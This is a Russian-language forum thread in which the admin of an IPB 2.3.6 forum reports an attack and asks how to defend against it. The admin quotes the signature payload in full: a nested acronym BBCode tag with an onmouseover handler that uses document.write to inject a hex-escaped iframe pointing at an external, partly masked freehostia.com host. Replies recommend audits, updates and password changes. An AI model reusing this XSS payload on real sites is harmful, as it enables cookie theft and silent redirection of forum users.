Хотят взломать, что делать

123 4
mower
На сайте с 01.12.2009
Offline
63
2660

Есть форум ipb

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

[acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym]

вот как работает тег акронима:


[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

Как защититься и что делать?

[Удален]
#1

ТС закажи у народа проверку твоего форума на уязвимости, с твоей стороны только оплатить и после выявление всех уязвимостей их устранить полностью. и тогда форуму мало кто будет страшен, тем более этот школьник.

mower
На сайте с 01.12.2009
Offline
63
#2

Этот "школьник" если захочет уведет любой твой сайт. Вообще попрошу тех кто ничего не понимает в данном вопросе в данной ветке не высказываться

[Удален]
#3
mower:
Этот "школьник" если захочет уведет любой твой сайт

гений приворота чтоли? :D

много он уже увел?

mff
На сайте с 21.02.2008
Offline
266
mff
#4

mower, как я понимаю ваш форум давно не обновлялся? Почитайте по сабжу: [Обзор уязвимостей IPB]

Netsp
На сайте с 17.01.2007
Offline
49
#5

#Pomeo# всё верно сказал, найди того, кто протестирует сайт на уязвимости. Акронимный эксплоит для ипб валяется в паблике, следовательно твой гипер-хакер - школьник.

Ипб последняя версия стоит?

mower
На сайте с 01.12.2009
Offline
63
#6

ипб 2 3 6

Netsp,

Т.е. уязвимость именно тега акроним? если я просто удалю этот тег разве нельзя сконструировать подобную конструкцию из других тегов?

mower добавил 07.03.2010 в 13:23

bearman:
гений приворота чтоли? :D

много он уже увел?

Я примерно догадываюсь кто ломает. Могу сказать что это человек, который занимается хакингом и да ,на его счету очень много взломов. Более того, это не 1 человек, а команда. То что они делают сейчас - это может быть и полноценной попыткой взлома, а может быть и разминкой

[Удален]
#7
mower:
То что они делают сейчас - это может быть и полноценной попыткой взлома, а может быть и разминкой

ну с помощью xss можно максимум куки украсть, но этого максимума иногда может быть достаточно)

bearman добавил 07.03.2010 в 13:27

mower:
если я просто удалю этот тег разве нельзя сконструировать подобную конструкцию из других тегов?

зависит от bb парсера

mower
На сайте с 01.12.2009
Offline
63
#8

1. Могут украсть куки - я перешел к ним на сайт ***.фрихостиа, какие именно куки они могут украсть: куки от сайта фрихостиа, куки от моего сайта, куки других сайтов (почта, короче все что там записано в браузере)

2. Я побывал на их сайте - значит могли и трояна закинуть

[Удален]
#9

1. куки вашего сайта

2. проверьтесь на вич)

[Удален]
#10
mower:
1. Могут украсть куки - я перешел к ним на сайт ***.фрихостиа, какие именно куки они могут украсть: куки от сайта фрихостиа, куки от моего сайта, куки других сайтов (почта, короче все что там записано в браузере)

2. Я побывал на их сайте - значит могли и трояна закинуть

1. меняй пароли от админки, рута и фтп твоего форума.

2. могли, поэтому ставь антвиря(хотя и антивирь тут может н еспасти), ищи людей кто тя выручит с проверкой на уязвимости.

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий